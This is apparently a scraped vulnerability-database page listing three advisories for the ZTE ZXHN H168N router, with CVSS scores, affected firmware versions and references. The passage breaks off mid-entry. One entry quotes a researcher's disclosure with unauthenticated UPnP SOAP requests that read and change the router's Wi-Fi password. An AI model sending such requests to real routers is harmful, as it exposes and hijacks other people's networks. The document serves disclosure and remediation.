All the vulnerabilites related to ZTE - ZXHN H168N
var-202104-2028
Vulnerability from variot
ZTE Corporation is the world's leading provider of integrated communications solutions.
ZTE Corporation ZXHN H168N has a command execution vulnerability. Attackers can use this vulnerability to execute arbitrary commands.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202104-2028",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-18277",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2021-18277",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE Corporation is the world\u0027s leading provider of integrated communications solutions.\n\r\n\r\nZTE Corporation ZXHN H168N has a command execution vulnerability. Attackers can use this vulnerability to execute arbitrary commands.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-18277",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"id": "VAR-202104-2028",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
],
"trust": 0.97662336
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"last_update_date": "2022-05-04T08:52:06.021000Z",
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-18277"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command execution vulnerability exists in ZXHN H168N of ZTE Corporation",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18277"
}
],
"trust": 0.6
}
}
var-202104-0778
Vulnerability from variot
A ZTE product is impacted by improper access control vulnerability. The attacker could exploit this vulnerability to access CLI by brute force attacks.This affects: ZXHN H168N V3.5.0_TY.T6
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202104-0778",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": "3.5.0_ty.t6"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21730"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:3.5.0_ty.t6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21730"
}
]
},
"cve": "CVE-2021-21730",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-21730",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-21730",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-922",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2021-21730",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A ZTE product is impacted by improper access control vulnerability. The attacker could exploit this vulnerability to access CLI by brute force attacks.This affects: ZXHN H168N V3.5.0_TY.T6",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"db": "VULMON",
"id": "CVE-2021-21730"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ZTE",
"id": "1014864",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2021-21730",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202104-922",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-21730",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"id": "VAR-202104-0778",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.37662336
},
"last_update_date": "2023-12-18T13:51:34.511000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21730"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1014864"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21730"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/863.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"date": "2021-04-13T16:15:12.450000",
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-22T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21730"
},
{
"date": "2022-07-12T17:42:04.277000",
"db": "NVD",
"id": "CVE-2021-21730"
},
{
"date": "2022-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H168N Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-922"
}
],
"trust": 0.6
}
}
var-201811-0983
Vulnerability from variot
ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
- Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host:
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1
- Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host:
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE- 2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201811-0983",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk1.2t2"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk1.2t5"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk11t"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk11t7"
},
{
"model": "zxhn h168n 2.2.0 pk11t7",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk11t",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t5",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t2",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t6",
"scope": "ne",
"trust": 0.3,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "105983"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7357"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Usman Saeed",
"sources": [
{
"db": "BID",
"id": "105983"
},
{
"db": "PACKETSTORM",
"id": "150728"
}
],
"trust": 0.4
},
"cve": "CVE-2018-7357",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7357",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-137389",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "psirt@zte.com.cn",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7357",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7357",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "psirt@zte.com.cn",
"id": "CVE-2018-7357",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201811-444",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-137389",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
